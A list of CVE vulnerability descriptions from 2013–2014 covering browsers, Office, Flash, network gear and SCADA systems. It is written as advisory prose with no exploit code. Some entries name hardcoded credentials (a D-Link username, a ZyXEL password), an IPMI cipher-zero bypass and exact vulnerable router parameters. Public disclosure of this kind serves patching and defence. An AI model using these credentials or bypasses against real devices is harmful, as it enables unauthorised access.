CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JC***A, JC***B, JD***A, JD***B, JE***A, JF***A, JF***B, JF***C, JG***A, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

